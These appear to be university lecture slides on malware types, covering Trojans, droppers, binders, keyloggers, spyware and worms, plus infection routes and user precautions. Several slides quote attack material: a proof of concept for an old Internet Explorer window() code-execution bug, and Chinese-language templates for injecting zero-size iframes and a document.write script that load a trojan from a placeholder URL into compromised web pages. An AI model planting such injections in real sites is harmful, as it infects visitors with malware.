The Attack and Defense of Computers
Dr. 許
富 皓
1
Malware
2
Malicious Software (Malware):
Security tools and toolkits
Back doors (trap doors)
Logic bombs
Viruses
Worms
Binders
Droppers
Trojan Horses
Bacteria or rabbit programs.
Spyware
Rootkit
URL Injection
Dialers
3
Security Tools and toolkits
Automatically scan for computer security
weaknesses.
Can be used by both security professionals and
attackers.
E.g. Nessus, COPS, ISS, Tiger, … and so on.
There are also programs and tool sets whose only
function is to attack computers.
Script kids
• P.S. These tools may damage the systems that install them or
may contain booby-trap that will compromise the systems that
install them.
4
Logic Bombs
A logic bomb is a piece of code
intentionally inserted into a software system
that will set off a malicious function when
specified conditions are met.
For example, a programmer may hide a piece of
code that starts deleting files, should he ever
leave the company (and the salary database).
Usually written by inner programmers.
5
Logic Bombs and Viruses and
Worms
Software that is inherently malicious, such as
viruses and worms, often contain logic bombs that
execute a certain payload at a pre-defined time or
when some other condition is met.
Many viruses attack their host systems on specific
dates, such as Friday the 13th or April
Fool's Day.
Trojans that activate on certain dates are often
called "time bombs".
6
Key Logger
A program or hardware device that captures
every key depression on the computer.
Also known as "Keystroke Cops," they are
used to monitor a user's activities by
recording every keystroke the user makes,
including typos, backspacing and retyping.
7
Security Concerns about Key
Loggers
Keystroke logging can be achieved by both hardware and
software means.
There is no easy way to prevent keylogging software being
installed on your PC, as it is usually done by a method of
stealth.
If you are using a home PC, then it is likely to be free on
any keystroke logging hardware (but remember there may
be keystroke logging software).
Try and avoid typing private details on public PCs, and
always try and avoid visiting sites on public PCs that
require you to enter your login details, e.g. An online
banking account.
8
Example
Ardamax Keylogger [1][2]
9
Dialers
A program that
replaces the phone number in a modern’s dial-up
connection with a long distance number, often out of
the country, in order to run up phone charges on payper-dial numbers
dials out at night to send keylogger or other information
to an attacker.
10
URL Injection
Change the URL submitted to a server belonging
to some or all domains.
11
Bacteria and Rabbits
Bacteria (also known as rabbit programs)
are a type of malware that create many
instances of themselves, or run many times
simultaneously, in order to consume large
amounts of system resources.
Bacteria create a denial of service effect as
legitimate programs may no longer be able
to run, or at least may not run properly.
12
Binder [CA]
13
Definition of Binder
A tool that combines two or more files into a
single file, usually for the purpose of hiding one of
them.
A binder compiles the list of files that you select
into one host file, which you can rename.
A host file is a simple custom compiled program that
will decompress and launch the embedded programs.
When you start the host, the embedded files in it are
automatically decompressed and launched.
14
Example
When a Trojan is bound with Notepad, for
instance, the result will appear to be
Notepad, and appear to run like
Notepad, but the Trojan will also be run.
15
Program
YAB: Yet Another Binder
User Guide
16
Dropper [Wikipedia]
17
Definition of a Dropper
A dropper is a program (malware
component) that has been designed to
"install" some sort of malware (virus,
backdoor, etc) to a target system.
Single stage: the malware code can be
contained within the dropper in such a way as
to avoid detection by virus scanners
Two stages: the dropper may download the
malware to the target machine once activated
18
Types of Droppers
There are two major types of droppers:
those that do not require user interaction
• perform through the exploitation of a system by
some vulnerability
those that require user interaction by
convincing the user that it is some legitimate or
benign program.
19
Examples
8sec!Trojan
20
Trojan Horse [Wikipedia]
21
Trojan Horse
In the context of computer software, a Trojan horse is a
malicious program that is disguised as or embedded within
legitimate software.
Trojans use false and fake names to trick users into
executing them.
These strategies are often collectively termed social engineering.
A Trojan is designed to operate with functions unknown to
the victim.
The useful, or seemingly useful, functions serve as
camouflage for these undesired functions.
22
Properties of Trojan Horses
Trojan horse programs cannot operate autonomously, in
contrast to some other types of malware, like worms.
Just as the Greeks needed the Trojans to bring the horse
inside for their plan to work,
Trojan horse programs depend on actions by the intended victims
if Trojans replicate and even distribute themselves, each new
victim must run the program/Trojan.
Due to the above reasons Trojan horses’ virulence depends
on
successful implementation of social engineering concepts
but doesn’t depend on
the flaws in a computer system's security design or configuration.
23
Categories of Trojan Horses
There are two common types of Trojan horses:
an otherwise useful software that has been corrupted by
a cracker inserting malicious code that executes while
the program is used.
• Examples include various implementations of
 weather alerting programs
 computer clock setting software
 peer to peer file sharing utilities.
a standalone program that masquerades as something
else, like a game or image file (e.g.
firework.jpg.exe in Windows.
24
Malware Parasitizes inside Trojan
Horses
In practice, Trojan Horses in the wild often
contain:
spying functions (such as a packet sniffer)
backdoor functions that allow a computer,
unbeknownst to the owner, to be remotely controlled
from the network, creating a zombie computer.
The Sony/BMG rootkit Trojan, distributed on
millions of music CDs through 2005, did both of
these things.
Because Trojan horses often have these harmful
behaviors, there often arises the misunderstanding
that such functions define a Trojan Horse.
25
Example of a Simple Trojan Horse
A simple example of a Trojan horse would
be a program named
waterfalls.scr.exe claiming to be a
free waterfall screensaver which, when run,
instead begins erasing all the files on the
computer.
26
E-Mail Trojan Horses
On the Microsoft Windows platform, an attacker might
attach a Trojan horse with an innocent-looking filename to
an email message which entices the recipient into opening
the file.
The Trojan horse itself would typically be a Windows
executable program file, and thus must have an executable
filename extension such as .exe, .com, .scr, .bat,
or .pif.
Since Windows is sometimes configured by default to hide
filename extensions from a user, the Trojan horse has an extension
that might be "masked" by giving it a name such as
Readme.txt.exe. With file extensions hidden, the user would
only see Readme.txt and could mistake it for a harmless text
file.
Icons can also be chosen to imitate the icon associated with
a different and benign program, or file type.
27
Trojan Downloader [F-Secure][Microsoft]
Trojan downloader is usually a standalone program that
attempts to secretly download and run other files from
remote web and ftp sites.
Usually Trojan downloaders
download different Trojans and backdoors
activate them on an affected system without user's approval.
Trojan downloader, when run, usually installs itself to
system and waits until Internet connection becomes
available. After that it attempts to connect to a web or ftp
site, download specific file or files and run them.
28
Commonly Used Methods of
Infection
Websites (掛馬).
E-mails.
Downloaded Files.
29
Websites
You can be infected by visiting a rogue website.
Internet Explorer is most often targeted by makers of
Trojans and other pests, because it contains numerous
bugs, some of which improperly handle data (such as
HTML or images) by executing it as a legitimate
program.
• Attackers who find such vulnerabilities can then specially craft
a bit of malformed data so that it contains a valid program to
do their bidding.
The more "features" a web browser has (for example
ActiveX objects, and some older versions of Flash or
Java), the higher your risk of having security holes that
can be exploited by a Trojan horse.
30
Example 1: Microsoft IE window() Arbitrary
Code Execution Vulnerability [Secunia]
The vulnerability is caused due to certain objects not being
initialized correctly when the window() function is used
in conjunction with the <body onload> event.
This can be exploited to execute arbitrary code on a
vulnerable browser via some specially crafted JavaScript
code called directly when a site has been loaded.
Example:
<body onload="window();">
Successful exploitation requires that the user is e.g. tricked
into visiting a malicious website.
PROOF OF CONCEPT
31
Explanation [Computer Terrorism]
32
< body onLoad= …> [HTML Code Tutorial]
The browser triggers onLoad when the
document is finished loading. The contents
of onLoad is one or more JavaScript
commands. So, for example, the following
< body ...> tag tells the browser to
bring up an alert box once the page is
completely loaded:
<BODY onLoad="alert('hello world!')">
33
MS IE - Crash on JavaScript
window()- calling (1)
There is a bug in Microsoft Internet Explorer,
which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer
can't handle a call to a JavaScript-function with the
name of the "window"-object.
An object used in Javascript.
34
MS IE - Crash on JavaScript
window()- calling (2) [symantic]
Internet Explorer fails to properly initialize the JavaScript
`Window()' function. When the 'onLoad' handler is set
to call the improperly initialized `Window()' function, the
Web browser attempts to call the address 0x006F005B,
which is derived from the Unicode representation of
'OBJECT'.
CALL DWORD [ECX+8]
1.
Crash, if pointing to non-code.
2.
Execution, if pointing to code.
It is shown that JavaScript prompt boxes can be used by
attackers to fill the memory region at 0x00600000 with
attacker-supplied data, allowing executable machine code
to be placed into the required address space.
35
Dangerous Web Site
The web site pointed by the following URL
is one containing the trap described in the
previous slides.
HTTP MSIE JavaScript OnLoad Rte CodeExec [symantic]
http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
36
Example 2: Trojan Horse Exploits
Image Flaw [Declan McCullagh et al.]
EasyNews, a provider of Usenet newsgroups, said
it has identified two JPEG images that take
advantage of a previously identified flaw ( a heapbased buffer overflow [Michael Cobb] ) in the way
Microsoft software handles graphics files.
Windows users could have their computers
infected merely by opening one of those Trojan
horse images.
Attackers tried to use these JPEGs to download
Trojan (horse programs) to vulnerable computers.
37
Example 3: Comprise a Web Server and Add
Hidden Download Instructions in Web Pages
Create frame with size 0.
38
網站掛馬語法[OpenBlue]
39
通常被利用
[ 弱點 ]
[ SQL Injection ]
或
[ 上傳網馬 ]等
手法掛馬後，會在該網頁的[ 第一行或
最後一行中 ]出現[ 相關被掛馬語法 ] .
40
框架掛馬
以下是部份語法：
<iframe src=木馬網址 width=0 height=0></iframe>
41
JScript 文件掛馬
首先將以下語法存檔為 xxx.js 然後將此
文件利用各種方式上傳到目標處
document.write("<iframe width='0' height='0' src='
木馬網址'></iframe>");
最後JScript 掛馬的語法為：
以下是部份語法：
<script language=javascript src=xxx.js></script>
42
Emails and Trojan Horses
The majority of Trojan horse infections occur
because the user was tricked into running an
infected program.
This is why you're not supposed to open
unexpected attachments on emails -- the
program is often a cute animation or a sexy
picture, but behind the scenes it infects the
computer with a Trojan or virus.
43
Microsoft Outlook
If you use Microsoft Outlook, you're
vulnerable to many of the same problems that
Internet Explorer has, even if you don't use
IE directly.
The same vulnerabilities exist since Outlook
allows email to contain HTML and images (and
actually uses much of the same code to process
these as Internet Explorer).
44
Downloaded Files
The infected program doesn't have to arrive
via email, though; it can be
sent to you in an Instant Message
downloaded from a Web site or by FTP
delivered on a CD or floppy disk
45
Precautions against Trojan Horses (1)
Trojan Horses are commonly spread through an email, much like other types of common viruses.
The only difference being of course is that a
Trojan Horse is hidden.
The best ways to protect yourself and your
company from Trojan Horses are as follows:
If you receive e-mail from someone that you do not
know or you receive an unknown attachment never
open it right away.
As an e-mail user you should confirm the source.
• Some hackers have the ability to steal an address books so if
you see e-mail from someone you know that does not
necessarily make it safe.
46
Precautions against Trojan Horses (2)
When setting up your e-mail client make sure that you
have the settings so that attachments do not open
automatically.
Some e-mail clients come ready with an anti-virus
program that scans any attachments before they are
opened.
• If your client does not come with this it would be best to
purchase on or download one for free.
Make sure your computer has an anti-virus program on
it and make sure you update it regularly.
• If you have an auto-update option included in your anti-virus
program you should turn it on, that way if you forget to update
your software you can still be protected from threats
47
Precautions against Trojan Horses (3)
Operating systems offer patches to protect their users
from certain threats and viruses, including Trojan Horses.
Software developers like Microsoft offer patches that in a sense
“close the hole” that the Trojan horse or other virus would use to
get through to your system. If you keep your system updated
with these patches your computer is kept much safer.
Avoid using peer-2-peer or P2P sharing networks like
Kazaa, Limewire, Ares, or Gnutella because
1)
2)
those programs are generally unprotected from Trojan Horses
Trojan Horses are especially easy to spread through these programs
Some of these programs do offer some virus protection but often
they are not strong enough.
48
Precautions against Trojan Horses (4)
NEVER download blindly from people or sites which you
aren’t 100% sure about.
However, legal web sites may be comprised by attackers who may
modify web pages to contain scripts to download malware.
Even if the file comes form a friend, you still must be sure
what the file is before opening it. (Ask your friend whether
she/he sent the files to you.)
Beware of hidden file extensions (Under Windows
susie.jpg.exe is only shown as susie.jpg)
Never user features in your programs that automatically get
or preview files (outlook, preview mode ).
Never blindly type commands that others tell you to type, or
go to the web site mentioned by strangers.
49
Well-known Trojan Horses
Back Orifice
Back Orifice 2000
Beast Trojan
NetBus
SubSeven
Downloader-EV
Pest Trap
flooder
Tagasaurus
Vundo trojan
Gromozon Trojan
50
Experiment
Survey some Trojan horses to see what
approaches are adopted by them to fool a
user to execute them.
51
List of Trojan Horses
http://en.wikipedia.org/wiki/List_of_trojan_horses
52
Spyware [Wikipedia]
53
A Large Number of Toolbars, Some Added by
Spyware, Overwhelm an IE Session
54
Some Statistics about Spyware [A. Moshchuk et al. ]
A recent scan (2005) performed by
AOL/NCSA of 329 customers’ computers
found that 80% were infected with spyware
programs.
Each infected computer contained an
average of 93 spyware components.
55
Definition of Spyware
Spyware is computer software that is
installed surreptitiously on a personal
computer to
monitor
intercept
or
take partial control over
the user's interaction with the computer,
without the user's informed consent.
56
Activities of Spyware
Spyware programs can
secretly monitor the user's behavior and then
send this information to a hacker over the
Internet
collect various types of personal information
interfere with user control of the computer in
other ways, such as
• installing additional software
• redirecting Web browser activity
• diverting advertising revenue to a third party.
57
Spyware Funcions [A. Moshchuk et al. ]
58
Types of Information Collected by
Spyware
Spyware can collect many different types of
information about a user.
More benign programs can attempt to track
what types of websites a user visits and send
this information to an advertisement agency.
More malicious versions can try to record what
a user types to try to intercept passwords or
credit card numbers.
Yet other versions simply launch pop-ups with
advertisements.
59
OSes vs. Spyware
As of 2006, spyware has become one of the
pre-eminent security threats to computersystems running Microsoft Windows OSes.
Some malware on the Linux and Mac OS
X platforms has behavior similar to
Windows spyware, but to date has not
become anywhere near as widespread.
60
Spyware Certification
The Spyware-Free Certification program
evaluates software to ensure that the
program does not install or execute any
forms of malicious code.
61
Typical Tactics Adopted by Spyware
Delivery of unsolicited pop-up advertisements.
Monitoring of Web-browsing activity for
marketing purposes.
Theft of personal information
62
Adware
The term adware frequently refers to any software
which displays advertisements, whether or not it
does so with the user's consent.
Programs such as the Eudora mail client display
advertisements as an alternative to shareware
registration fees.
These classify as "adware" in the sense of
advertising-supported software, but not as
spyware.
Adware in this form does not operate surreptitiously or
mislead the user, and provides the user with a specific
service.
63
Spyware and Pop-up Ads
Spyware displays advertisements related to what it finds
from spying on you, not the ones posted by advertisers.
Claria Corporation's Gator Software and Exact
Advertising's BargainBuddy provide examples of this
sort of program.
Visited Web sites frequently install Gator on client
machines in a surreptitious manner, and it directs revenue
to the installing site and to Claria by displaying
advertisements to the user. The user experiences a large
number of pop-up advertisements.
64
Pop-up Ads
Pop-up ads or popups are a form of online
advertising on the World Wide Web.
It works when certain web pages open a new web
browser window to display advertisements.
The pop-up window containing an advertisement
is usually generated by JavaScript, but can be
generated by other means as well.
65
Pop-under Ads
A variation on the pop-up window is the
pop-under advertisement. This opens a new
browser window, behind the active window.
Pop-unders interrupt the user less, but are
not seen until the desired windows are
closed, making it more difficult for the user
to determine which Web page opened them.
66
Dozens of Pop-up Ads Cover a
Desktop.
67
Web Activity Monitor
Other spyware behavior, such as reporting on
websites the user visits, frequently accompany the
displaying of advertisements.
Monitoring web activity aims at building up a
marketing profile on users in order to sell
"targeted" advertisement impressions.
The prevalence of spyware has cast suspicion upon
other programs that track Web browsing, even for
statistical or research purposes.
• Some observers describe the Alexa Toolbar, an Internet
Explorer plug-in published by Amazon.com, as spyware (and
some anti-spyware programs report it as such) although many
users choose to install it.
68
Other Victims of Spyware
The prevalence of spyware has cast
suspicion upon other programs that track
Web browsing, even for statistical or
research purposes.
Some observers describe the Alexa
Toolbar, an Internet Explorer plug-in
published by Amazon.com, as spyware (and
some anti-spyware programs report it as such)
although many users choose to install it.
69
Identity Theft and Fraud
Some spyware is closely associated with identity theft.
Spyware may transmit the following information to
attackers:
chat sessions,
user names,
passwords,
bank information, etc.
Spyware has principally become associated with identity
theft in that keyloggers are routinely packaged with
spyware.
John Bambenek, who researches information security, estimates
that identity thieves have stolen over $24 billion US dollars of
account information in the United States alone
70
Routes of Infection
71
Routes of Infection
Spyware does not directly spread in the
manner of a computer virus or worm:
generally, an infected system does not attempt
to transmit the infection to other computers.
Instead, spyware gets on a system
through deception of the user
or
through exploitation of software vulnerabilities.
72
Masquerade
One way of distributing spyware involves
tricking users by manipulating security
features designed to prevent unwanted
installations.
73
Masquerade - Example
The Internet Explorer Web browser, by design,
prevents websites from initiating an unwanted
download.
Instead, a user action (such as clicking on a link)
must normally trigger a download.
However, links can prove deceptive:
For instance,
1. A pop-up ad may appear like a standard Windows dialog box.
2. The box contains a message such as "Would you like to
optimize your Internet access?" with links which look like
buttons reading Yes and No.
3. No matter which "button" the user presses, a download starts,
placing the spyware on the user's system.
74
A Masquerade Example
Malicious websites may attempt to install spyware on
readers' computers.
In this screenshot a website has triggered a pop-up that offers spyware
in the guise of a security upgrade.
75
Bundled with Shareware
Spyware can also come bundled with
shareware
other downloadable software
music CDs.
The user downloads a program (for instance, a
music program or a file-trading utility) and installs
it, and the installer additionally installs the
spyware. Although the desirable software itself
may do no harm, the bundled spyware does.
In some cases, spyware authors have paid shareware
authors to bundle spyware with their software.
In other cases, spyware authors have repackaged
desirable free software with installers that add spyware.
76
Bundled Shareware Example
The BearShare file-trading program, "supported" by WhenU spyware.
In order to install BearShare, users must agree to install "the SAVE! bundle"
from WhenU.
The installer provides only a tiny window in which to read the lengthy license
agreement. Although the installer claims otherwise, the software transmits users'
browsing activity to WhenU servers.
77
Through Trojan Horse
Classically, a Trojan horse, by definition,
smuggles in something dangerous in the guise of
something desirable. Some spyware programs get
spread in just this manner.
The distributor of spyware presents the program as
a useful utility — for instance as a Web
accelerator or as a helpful software agent.
Users download and install the software without
immediately suspecting that it could cause harm.
78
Vulnerabilities in Web Browsers
Some spyware authors infect a system by attacking
security holes
in the Web browser
or
in other software.
When the user navigates to a Web page controlled by the
spyware author, the page contains code which attacks the
browser and forces the download and install of spyware.
Common browser exploits target security vulnerabilities in
Internet Explorer and in the Microsoft Java runtime.
79
Notable Programs Distributed with
Spyware
Messenger Plus! (only if you agree to install their "sponsor" program)
Bearshare
Bonzi Buddy
DAEMON Tools (only if you agree to install their "sponsor" program)
DivX (except for the paid version, and the "standard" version without the
encoder). DivX announced removal of GAIN software from version 5.2.
Dope Wars
ErrorGuard
FlashGet (free version)
Grokster
Kazaa
Morpheus
RadLight
WeatherBug
EDonkey2000
80
Worm
81
Worms
Worm spread themselves through proactively
attacking programs with specific vulnerability.
Most frequently used attack approaches included
buffer overflow attacks, format string attacks,
integer overflow attacks, … and so on.
Morris Worm ,1988
Code Red, Slammer.
82
Comparisons between Viruses,
Trojan Horses, and Worms
The way they behave
How are they triggered?
How do they spread?
Need host programs?
83